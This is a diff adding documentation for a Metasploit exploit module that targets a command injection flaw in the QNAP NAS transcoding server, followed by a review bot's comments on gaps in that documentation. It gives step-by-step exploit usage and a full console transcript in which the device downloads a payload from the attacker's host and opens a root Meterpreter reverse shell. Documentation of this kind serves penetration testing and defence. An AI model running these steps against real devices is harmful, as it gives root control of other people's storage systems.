|
| 1 | +## Description |
| 2 | + |
| 3 | + This module exploits an unauthenticated remote command injection vulnerability in QNAP NAS devices. The transcoding server listens on port 9251 by default and is vulnerable to command injection using the 'rmfile' command. |
| 4 | + |
| 5 | + |
| 6 | +## Vulnerable Application |
| 7 | + |
| 8 | + [QNAP](https://www.qnap.com/) designs and delivers high-quality network attached storage (NAS) and professional network video recorder (NVR) solutions to users from home, SOHO to small, medium businesses. |
| 9 | + |
| 10 | + This module was tested successfully on a QNAP TS-431 with firmware version 4.3.3.0262 (20170727). |
| 11 | + |
| 12 | + |
| 13 | +## Verification Steps |
| 14 | + |
| 15 | + 1. Start `msfconsole` |
| 16 | + 2. Do: `use exploit/linux/misc/qnap_transcode_server` |
| 17 | + 3. Do: `set RHOST [IP]` |
| 18 | + 4. Do: `set LHOST [IP]` |
| 19 | + 5. Do: `run` |
| 20 | + 6. You should get a session |
| 21 | + |
| 22 | + |
| 23 | +## Options |
| 24 | + |
| 25 | + **Delay** |
| 26 | + |
| 27 | + How long to wait (in seconds) for the device to download the payload. |
| 28 | + |
| 29 | + |
| 30 | +## Scenarios |
| 31 | + |
| 32 | + ``` |
| 33 | + msf > use exploit/linux/misc/qnap_transcode_server |
| 34 | + msf exploit(qnap_transcode_server) > set rhost 10.1.1.123 |
| 35 | + rhost => 10.1.1.123 |
| 36 | + msf exploit(qnap_transcode_server) > check |
| 37 | + [*] 10.1.1.123:9251 The target service is running, but could not be validated. |
| 38 | + msf exploit(qnap_transcode_server) > set lhost 10.1.1.197 |
| 39 | + lhost => 10.1.1.197 |
| 40 | + msf exploit(qnap_transcode_server) > run |
| 41 | +
|
| 42 | + [*] Started reverse TCP handler on 10.1.1.197:4444 |
| 43 | + [*] 10.1.1.123:9251 - Using URL: http://0.0.0.0:8080/IQrgbm |
| 44 | + [*] 10.1.1.123:9251 - Local IP: http://10.1.1.197:8080/IQrgbm |
| 45 | + [*] 10.1.1.123:9251 - Sent command successfully (52 bytes) |
| 46 | + [*] 10.1.1.123:9251 - Waiting for the device to download the payload (30 seconds)... |
| 47 | + [*] 10.1.1.123:9251 - Sent command successfully (22 bytes) |
| 48 | + [*] 10.1.1.123:9251 - Sent command successfully (13 bytes) |
| 49 | + [*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.123:53888) at 2017-08-13 05:05:18 -0400 |
| 50 | + [*] 10.1.1.123:9251 - Sent command successfully (19 bytes) |
| 51 | + [*] 10.1.1.123:9251 - Command Stager progress - 100.00% done (109/109 bytes) |
| 52 | + [*] 10.1.1.123:9251 - Server stopped. |
| 53 | +
|
| 54 | + meterpreter > getuid |
| 55 | + Server username: uid=0, gid=0, euid=0, egid=0 |
| 56 | + meterpreter > sysinfo |
| 57 | + Computer : 10.1.1.123 |
| 58 | + OS : (Linux 3.2.26) |
| 59 | + Architecture : armv7l |
| 60 | + Meterpreter : armle/linux |
| 61 | + ``` |
| 62 | + |
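Review bot: The Vulnerable Application section (new-file lines 8 to 10) names only the single tested configuration, a TS-431 on firmware 4.3.3.0262 (20170727), and opens with vendor marketing copy. Replace that paragraph with the affected models and firmware range and a link to the vendor advisory or fixed release, so a reader can tell whether a given device is exposed and which version to upgrade to. In Options, `Delay` is described without its default, although the scenario output shows "(30 seconds)"; state the default next to the description. The scenario also runs `check` and gets "The target service is running, but could not be validated", but Verification Steps never mention `check`; add a step for it and a sentence on how to read that result, since it does not confirm the device is vulnerable.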